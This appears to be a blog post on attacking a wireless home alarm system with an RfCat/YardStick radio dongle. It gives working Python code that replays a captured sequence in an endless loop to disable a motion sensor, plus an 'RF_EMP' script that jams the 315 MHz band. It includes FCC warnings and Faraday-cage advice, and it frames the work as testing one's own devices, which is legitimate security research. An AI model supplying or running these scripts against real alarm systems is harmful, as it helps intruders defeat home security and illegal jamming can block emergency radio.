Testing / Troubleshooting: 

I first tried sending only the repeating sequence under the assumption the opening sequence was a fluke but that did not work. 
I then tried sending only the opening sequence and that didn't work either.  
I combined the first part with a repeating 2nd part for 10 iterations 
The alert light immediately turned off on the device when testing from an alerting state, and from all states stopped alerting completely
Note(My light no longer turns off, I think I broke it or something LOL, or my setup at the time was different to current testing) 

In order to send the first part and the second part we need to send it so that we have padding between each sequence and in a way that only the second part repeats, we can do that the following way: 
d.RFxmit("\x88\xa2\x8a\x28\xa8\x8a\x28\xa0\x00\x00\x00\x00\x00\x00" + "\xA2\xA2\x88\xA2\x8A\x28\xA8\xA2\x8A\x28\x00\x00\x00\x00\x00\x00"*40)

The above is very simple, to explain:

  • First add in your opening patterns HEX values
  • Pad that with 6 \x00 for spacing
  • Add the second patterns HEX values and add that with 6 \x00
  • Now multiply the second part by 10 since in the wave output this part was repeating

Below is the full code to do this, it is the same as the doorbell code with the new line from above and a While 1 loop that never stops so that the device is fully disabled using its own functionality against it :)  
SUCCESS

As a quick test if you intentionally trip the sensor and immediately send this code the BEEP BEEP BEEP will be cut short to a single BEEP also the light may turn off depending how its configured. In all cases the motion sensor capability will be disabled. If you turn this script on at any time the sensor is completely disabled until you stop your transmission:

#--------Disable The Motion Sensor --------#: 
from rflib import *

d = RfCat()
d.setFreq(315005000)
d.setMdmModulation(MOD_ASK_OOK)
d.setMdmDRate(4800)

while 1:  #Added a loop to keep the sensor disabled
print ("Starting Transmission")
d.RFxmit("\x88\xa2\x8a\x28\xa8\x8a\x28\xa0\x00\x00\x00\x00\x00\x00" + "\xA2\xA2\x88\xA2\x8A\x28\xA8\xA2\x8A\x28\x00\x00\x00\x00\x00\x00"*40)
print ("Transmission Complete")
#--------End Code --------#




Jamming RF With Python: 

Bypassing the sensors worked, but then I got thinking, so what if the company puts out a new patch and I am no longer able to turn off the sensors by using the devices functionality against itself? Or what if I wanted to bypass the door alert when the door is opened and it breaks the connection?  The door alert does not have a disable signal sent back to the receiver, it always alerts when separated. 

RF Jamming and the FCC: 

One way we can do this is with RF Jamming attacks. However, it should be noted that Jamming is technically ILLEGAL in the US on all frequencies. So in order to test this in a Legal way you will need a walk in Faraday cage to place your equipment and do some testing. This way you will not interfere with the operation of other devices on the frequency that you are jamming. 


From the FCC: https://apps.fcc.gov/edocs_public/attachmatch/DA-12-1642A1.pdf

"We caution consumers that it is against the law to use a cell or GPS jammer or any other type of device that blocks, jams or interferes with authorized communications, as well as to import, advertise, sell, or ship such a device. The FCC Enforcement Bureau has a zero tolerance policy in this area and will take aggressive action against violators. "


Notes On the reality of Criminals: 

It should also be noted that if a criminal is trying to break into your house or a building protected by an alert system that uses wireless technologies, he is probably not following FCC guidelines. So assume if you can attack your alarm system in the safety of a Faraday cage.  Your alarm system is vulnerable to attack by any criminal. A fair assumption when penetration testing an alarm system your considering for install.  You may want devices which are hardwired in as a backup. 

There has always been Jammers for things like Cellphones, WiFi networks. With the introduction of affordable software defined radio devices an attacker can jam the 315 frequency to disable your alert system as a viable attack.  A simple python script can kill a device in the 315 range and make it in-operable. 

Jamming in Python: 

I found the below script to be 100% effective while testing within a Faraday enclosure. Basically  the device pauses in its current operational state, idle state or a alert light state, the device will remain in that state indefinitely until the jamming attack is stopped and the devices are manually reset.

Use a Faraday cage for your security testing: 

If you use the below code make sure you use precautions such as Faraday cages to ensure the legal guidelines are met and you are not interfering with other devices in your area. You must assume that radios used by police, fire departments and other public safety activities could be blocked if you are not enclosing your signal. This code is purely for you to test your devices before installing them for the security of your assets. 

I call the below program RF_EMP,  not because its sending an electronic pulse but because similar to an EMP its disabling all devices in its range.  Which is why you need to use a Faraday cage so as not to interfere with devices you do not own. 
Below is a simple manually configurable version of this script. 


#--------RF_Emp.py Simple Version --------#: 

# For use within Faraday Enclosures only
from rflib import *

print "Start RF Jamming FTW"
d = RfCat()
d.setMdmModulation(MOD_ASK_OOK)
d.setFreq(315000000)
d.setMdmSyncMode(0)
d.setMdmDRate(4800)
d.setMdmChanSpc(24000)
d.setModeIDLE()
d.setPower(100)
d.makePktFLEN(0)

print "Starting JAM Session,  Make sure your in your Faraday Enclosure..."
d.setModeTX() # start transmitting
raw_input("Unplug to stop jamming")
print 'done'
d.setModeIDLE() # This puts the YardStick in idle mode to stop jamming (Not convinced this works)
#--------End Code --------#

Notes on using Virtual Machines: 


You can do your RF testing on a virtual machine with pre-installed tools but its kind of sketchy and you might want to throw your Yardstick against the wall in a fury of anger when you have to unplug it after every transmission. After a few fits of blind rage I decided to install it natively so my tools work every time without removing the dongle after each transmission. 

Whats next: 

This is it for the first blog..  Other topics  will be discussed later, such as attacking devices in a blackbox assessment and configuring your own key fobs. Rolling code devices and bypassing their protections. Monitoring and attacking car components. If you have anything to add or would like to help out.. Feel free to comment and add to the discussion. 
Continue reading